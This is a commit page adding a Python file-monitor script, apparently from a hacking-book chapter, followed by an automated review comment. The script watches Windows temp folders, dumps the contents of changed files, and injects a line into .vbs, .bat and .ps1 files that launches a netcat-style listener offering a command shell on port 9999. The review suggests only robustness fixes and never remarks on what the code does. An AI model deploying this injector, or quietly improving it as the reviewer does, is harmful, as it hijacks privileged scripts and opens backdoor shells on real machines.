
Commit 5dfedc5

committed
push chapter10 file_monitor.py
1 parent 9e09ff8 commit 5dfedc5


1 file changed

+130
-0
lines changed

1 file changed

+130
-0
lines changed
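--- a/file_monitor.py
+++ b/file_monitor.py
@@ -0,0 +1,130 @@
+#-*- coding:utf8 -*-
+
+"""
+@version:
+@author: giantbranch
+@file: file_monitor.py
+@time: 2016/3/14 23:36
+"""
+
+import tempfile
+import threading
+import win32file
+import win32con
+import os
+
+# 这些是典型的临时文件所在路径,就是我们监控的目录
+dirs_to_monitor = ["C:\\WINDOWS\\Temp",tempfile.gettempdir()]
+
+# 文件修改行为对应常量
+FILE_CREATE = 1
+FILE_DELETE = 2
+FILE_MODIFIED = 3
+FILE_RENAMED_FROM = 4
+FILE_RENAMED_TO = 5
+
+# 定义匹配特定文件扩展名的字典
+file_types = {}
+
+command = "python C:\\WINDOWS\\TEMP\\bhpnet.py –l –p 9999 –c"
+# 每段扩展名对应一个特定的标签及我们想要插入的一段脚本
+file_types['.vbs'] = ["\r\n'bhpmarker\r\n","\r\nCreateObject(\"Wscript.Shell\").Run(\"%s\")\r\n" % command]
+file_types['.bat'] = ["\r\nREM bhpmarker\r\n","\r\n%s\r\n" % command]
+file_types['.ps1'] = ["\r\n#bhpmarker","Start-Process \"%s\"" % command]
+
+# 用于执行代码插入的函数
+def inject_code(full_filename, extension, contents):
+# 判断文件是否存在标记
+if file_types[extension][0] in contents:
+return
+
+# 如果没有标记的话,那么插入代码并标记
+full_contents = file_types[extension][0]
+full_contents += file_types[extension][1]
+full_contents += contents
+
+fd = open(full_filename, "wb")
+fd.write(full_contents)
+fd.close()
+
+print "[\o/] Injected code"
+
+return
+
+# 为每个监控器起一个线程
+def start_monitor(path_to_watch):
+
+# 访问模式
+FILE_LIST_DIRECTORY = 0x0001
+
+# 获取文件目录句柄
+h_directory = win32file.CreateFile(
+path_to_watch,
+FILE_LIST_DIRECTORY,
+win32con.FILE_SHARE_READ |win32con.FILE_SHARE_WRITE | win32con.FILE_SHARE_DELETE,
+None,
+win32con.OPEN_EXISTING,
+win32con.FILE_FLAG_BACKUP_SEMANTICS,
+None
+)
+
+while 1:
+try:
+# 这函数会在目录结构改变时通知我们
+results = win32file.ReadDirectoryChangesW(
+h_directory,
+1024,
+True,
+win32con.FILE_NOTIFY_CHANGE_FILE_NAME |
+win32con.FILE_NOTIFY_CHANGE_DIR_NAME |
+win32con.FILE_NOTIFY_CHANGE_ATTRIBUTES |
+win32con.FILE_NOTIFY_CHANGE_SIZE |
+win32con.FILE_NOTIFY_CHANGE_LAST_WRITE |
+win32con.FILE_NOTIFY_CHANGE_SECURITY,
+None,
+None
+)
+
+# 我们可以获得发送了何种改变,以及目标文件的名称
+for action,file_name in results:
+full_filename = os.path.join(path_to_watch, file_name)
+
+if action == FILE_CREATE:
+print "[ + ] Created %s" % full_filename
+elif action == FILE_DELETE:
+print "[ - ] Deleted %s" % full_filename
+elif action == FILE_MODIFIED:
+print "[ * ] Modified %s" % full_filename
+# 输出文件内容
+print "[vvv] Dumping contents..."
+try:
+# 打开文件读数据
+fd = open(full_filename, "rb")
+contents = fd.read()
+fd.close()
+print contents
+print "[^^^] Dump complete."
+except:
+print "[!!!] Failed."
+
+# 文件和文件扩展名分离
+filename, extension = os.path.splitext(full_filename)
+if extension in file_types:
+inject_code(full_filename, extension, contents)
+
+# 重命名哪个文件
+elif action == FILE_RENAMED_FROM:
+print "[ > ] Renamed from: %s" % full_filename
+# 重命名后的文件名是?
+elif action == FILE_RENAMED_TO:
+print "[ < ] Renamed to: %s" % full_filename
+else:
+print "[???] Unknown: %s" % full_filename
+except:
+pass
+
+
+for path in dirs_to_monitor:
+monitor_thread = threading.Thread(target=start_monitor,args=(path,))
+print "Spawning monitoring thread for path: %s" % path
+monitor_thread.start()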
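Review bot: When the read in the `try` at lines 100-108 fails, `contents` is either unbound (first event) or stale from an earlier file, yet line 113 still passes it on, so a failed read can end with one file's bytes written into another; the bare `except: pass` at lines 123-124 then hides the resulting NameError together with every other error, including failures of ReadDirectoryChangesW, so the thread spins silently. Narrow both handlers to `except Exception as e:` and print the error, and add a `continue` after `print "[!!!] Failed."` so a failed read never reaches the splitext/inject branch. The handle returned by `win32file.CreateFile` at line 61 is also never closed; the `while 1:` loop has no exit, so consider a `try/finally` around it that calls `h_directory.Close()`. The page also shows no `if __name__ == "__main__":` guard around the thread spawning at lines 127-130, so importing the module starts the monitors as a side effect.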
